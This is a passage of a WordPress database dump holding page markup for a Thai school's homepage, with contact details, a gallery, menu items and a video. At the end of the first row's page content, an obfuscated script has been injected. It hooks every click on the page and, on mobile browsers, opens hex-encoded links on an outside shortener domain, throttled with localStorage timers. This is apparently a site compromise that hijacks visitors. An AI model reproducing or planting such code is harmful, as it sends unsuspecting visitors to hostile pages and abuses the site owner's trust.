{\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:54:59','2024-07-29 11:54:59','',19,'http://watprato.ssk.in.th/?p=130',0,'revision','',0),
(131,1,'2024-07-29 18:55:24','2024-07-29 11:55:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 